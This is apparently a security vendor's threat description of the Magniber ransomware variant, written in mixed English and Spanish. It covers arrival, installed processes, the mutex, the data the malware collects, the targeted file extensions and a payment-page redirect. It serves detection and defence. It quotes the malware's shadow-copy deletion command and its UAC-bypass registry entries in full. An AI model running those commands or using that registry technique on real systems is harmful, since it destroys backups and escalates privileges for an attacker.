Ransom.Win64.MAGNIBER.C

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Este malware no tiene ninguna rutina de propagación.

Este malware no tiene ninguna rutina de puerta trasera.

Recopila determinada información del equipo afectado.

Redirige los navegadores a determinados sitios.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Agrega los procesos siguientes:

• Display ransom note:
  • notepad.exe %Public%\readme.txt
• Open payment page through browser:
  • cmd /c "start http://{Random characters}kynscshsn.{BLOCKED}s.uno/kynscshsn&{string1}&{string2}&{string3}&{string4}&{string5} "
    • where
    • string1
    • The number of drives in which the ransomware has enumerated files
    • string2
    • Total size of encrypted data has generated in bytes
    • string3
    • The number of files it encrypts
    • string4
    • The number of file it enumerates
    • string5
    • The build number of the comprimised windows OS
• %System%\wbem\wmic process call create "vssadmin. exe Delete Shadows /all /quiet" → deletes shadow copies
• cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"" → If running on Win10
• cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"" → if running on Windows versions < Win10

Se introduce en los siguientes procesos que se ejecutan en la memoria del sistema afectado:

• It injects into each process if the ff. criteria is met:
  • The process is not iexplore.exe

Agrega las siguientes exclusiones mutuas para garantizar que solo se ejecuta una de sus copias en todo momento:

• kynscshsn

Otras modificaciones del sistema

Agrega las siguientes entradas de registro:

if running on Win10:
HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(Default) = regsvr32.exe scrobj.dll /s /u /n /i:%Public%\readme.txt → initial registry entry where file originally contains code to delete shadow files

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
DelegateExecute = 0

if running on Windows versions < Win10:
HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
(Default) = %System%\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

Propagación

Este malware no tiene ninguna rutina de propagación.

Rutina de puerta trasera

Este malware no tiene ninguna rutina de puerta trasera.

Robo de información

Recopila la siguiente información del equipo afectado:

• The number of drives it enumerates
• Total size of encrypted data
• The number of encrypted files
• The number of enumerated files
• Build number of the compromised windows operating system

Otros detalles

Cifra los archivos con las extensiones siguientes:

• abm
• abs
• abw
• accdb
• act
• adn
• adp
• aes
• aft
• afx
• agif
• agp
• ahd
• ai
• aic
• aim
• albm
• alf
• ans
• apd
• apm
• apng
• aps
• apt
• apx
• arc
• art
• arw
• asc
• ase
• asf
• ask
• asm
• asp
• asw
• asy
• aty
• avi
• awdb
• awp
• awt
• aww
• azz
• bad
• bak
• bay
• bbs
• bdb
• bdp
• bdr
• bean
• bib
• bmp
• bmx
• bna
• bnd
• boc
• bok
• brd
• brk
• brn
• brt
• bss
• btd
• bti
• btr
• c
• ca
• cals
• can
• cd
• cdb
• cdc
• cdg
• cdmm
• cdmt
• cdmz
• cdr
• cdt
• cf
• cfu
• cgm
• cimg
• cin
• cit
• ckp
• class
• clkw
• cma
• cmx
• cnm
• cnv
• colz
• cpc
• cpd
• cpg
• cpp
• cps
• cpx
• crd
• crt
• crw
• cs
• csr
• csv
• csy
• ct
• cvg
• cvi
• cvs
• cvx
• cwt
• cxf
• cyi
• dad
• daf
• db
• dbc
• dbf
• dbk
• dbs
• dbt
• dbv
• dbx
• dca
• dcb
• dch
• dcr
• dcs
• dct
• dcx
• dd
• dds
• ded
• der
• dgn
• dgs
• dgt
• dhs
• dib
• dif
• dip
• diz
• djv
• djvu
• dmi
• dmo
• dnc
• dne
• doc
• docb
• docm
• docx
• docz
• dot
• dotm
• dotx
• dpp
• dpx
• dqy
• drw
• drz
• dsk
• dsn
• dsv
• dt
• dta
• dtsx
• dtw
• dv
• dvi
• dwg
• dx
• dxb
• dxf
• eco
• ecw
• ecx
• edb
• efd
• egc
• eio
• eip
• eit
• em
• emd
• emf
• emlx
• ep
• epf
• epp
• eps
• epsf
• eq
• erf
• err
• etf
• etx
• euc
• exr
• fa
• faq
• fax
• fb
• fbx
• fcd
• fcf
• fdf
• fdr
• fds
• fdt
• fdx
• fdxt
• fes
• fft
• fi
• fic
• fid
• fif
• fig
• fla
• flr
• flv
• fmv
• fo
• fodt
• fpos
• fpt
• fpx
• frm
• frt
• frx
• ftn
• fwdn
• fxc
• fxg
• fzb
• fzv
• gcdp
• gdb
• gdoc
• gem
• geo
• gfb
• gfie
• ggr
• gif
• gih
• gim
• gio
• glox
• gpd
• gpg
• gpn
• gro
• grob
• grs
• gsd
• gthr
• gtp
• gv
• gwi
• gz
• h
• hbk
• hdb
• hdp
• hdr
• hht
• his
• hp
• hpg
• hpi
• hs
• htc
• hwp
• hz
• ib
• ibd
• icn
• icon
• icpr
• idc
• idea
• idx
• igt
• igx
• ihx
• ii
• iiq
• imd
• info
• ink
• ipf
• ipx
• iso
• itdb
• itw
• iwi
• j
• jar
• jas
• java
• jbig
• jbmp
• jbr
• jfif
• jia
• jis
• jng
• joe
• jpe
• jpeg
• jpg
• jps
• jpx
• jrtf
• js
• jsp
• jtf
• jtx
• jw
• jxr
• kdb
• kdbx
• kdc
• kdi
• kdk
• kes
• key
• kic
• klg
• knt
• kon
• kpg
• kwd
• lay
• lbm
• lbt
• ldf
• lgc
• lis
• lit
• ljp
• lmk
• lnt
• lrc
• lst
• ltr
• ltx
• lue
• luf
• lwo
• lwp
• lws
• lyt
• lyx
• ma
• mac
• man
• map
• maq
• mat
• max
• mb
• mbm
• mbox
• mdb
• mdf
• mdn
• mdt
• me
• mef
• mel
• mft
• mgcb
• mgmf
• mgmt
• mgmx
• mgtx
• mid
• min
• mkv
• mm
• mmat
• mnr
• mnt
• mos
• mov
• mpeg
• mpf
• mpg
• mpo
• mrg
• mrxs
• msg
• mud
• mwb
• mwp
• mx
• my
• myd
• myi
• ncr
• nct
• ndf
• nef
• nfo
• njx
• nlm
• now
• nrw
• nsf
• nyf
• nzb
• obj
• oce
• oci
• ocr
• odb
• odg
• odm
• odo
• odp
• ods
• odt
• of
• oft
• omf
• oplc
• oqy
• ora
• orf
• ort
• orx
• ost
• ota
• otg
• oti
• otp
• ots
• ott
• ovp
• ovr
• owc
• owg
• oyx
• ozb
• ozj
• ozt
• p
• pa
• pan
• pano
• pap
• paq
• pas
• pbm
• pcd
• pcs
• pdb
• pdd
• pdf
• pdm
• pds
• pdt
• pef
• pem
• pff
• pfi
• pfs
• pfv
• pfx
• pgf
• pgm
• phm
• php
• pic
• pict
• pix
• pjpg
• pjt
• plt
• pm
• pmg
• png
• pni
• pnm
• pntg
• pnz
• pobj
• pop
• pot
• potm
• potx
• ppam
• ppm
• pps
• ppsm
• ppsx
• ppt
• pptm
• pptx
• prt
• prw
• psd
• psdx
• pse
• psid
• psp
• pst
• psw
• ptg
• pth
• ptx
• pu
• pvj
• pvm
• pvr
• pwa
• pwi
• pwr
• px
• pxr
• pza
• pzp
• pzs
• qd
• qmg
• qpx
• qry
• qvd
• rad
• rar
• ras
• raw
• rb
• rctd
• rcu
• rd
• rdb
• rft
• rgb
• rgf
• rib
• ric
• riff
• ris
• rix
• rle
• rli
• rng
• rpd
• rpf
• rpt
• rri
• rs
• rsb
• rsd
• rsr
• rst
• rt
• rtd
• rtf
• rtx
• run
• rw
• rzk
• rzn
• saf
• sam
• sbf
• scad
• scc
• sch
• sci
• scm
• sct
• scv
• scw
• sdb
• sdf
• sdm
• sdoc
• sdw
• sep
• sfc
• sfw
• sgm
• sh
• sig
• skm
• sla
• sld
• sldm
• sldx
• slk
• sln
• sls
• smf
• sms
• snt
• sob
• spa
• spe
• sph
• spj
• spp
• spq
• spr
• sq
• sqb
• srw
• ssa
• ssk
• st
• stc
• std
• sti
• stm
• stn
• stp
• str
• stw
• sty
• sub
• suo
• svf
• svg
• svgz
• swf
• sxc
• sxd
• sxg
• sxi
• sxm
• sxw
• tab
• tar
• tbk
• tcx
• tdf
• tdt
• te
• tex
• text
• tgz
• thp
• tif
• tiff
• tlb
• tlc
• tm
• tmd
• tmv
• tmx
• tne
• tpc
• trm
• tvj
• udb
• ufr
• unx
• uof
• uop
• uot
• upd
• usr
• utxt
• vb
• vbr
• vbs
• vcd
• vct
• vdb
• vdi
• vec
• vm
• vmdk
• vmx
• vnt
• vob
• vpd
• vrm
• vrp
• vsd
• vsdm
• vsdx
• vsm
• vstm
• vstx
• vue
• vw
• wav
• wbk
• wcf
• wdb
• wgz
• wire
• wks
• wma
• wmdb
• wmv
• wn
• wp
• wpa
• wpd
• wpg
• wps
• wpt
• wpw
• wri
• wsc
• wsd
• wsh
• wtx
• x
• xar
• xd
• xdb
• xlc
• xld
• xlf
• xlgc
• xlm
• xls
• xlsb
• xlsm
• xlsx
• xlt
• xltm
• xltx
• xlw
• xps
• xwp
• xyp
• xyw
• ya
• ybk
• ym
• zabw
• zdb
• zdc
• zip
• zw

Redirige los navegadores a los siguientes sitios:

• http://{Random characters}kynscshsn.{BLOCKED}s.uno/kynscshsn&{string1}&{string2}&{string3}&{string4}&{string5} → connects to payment page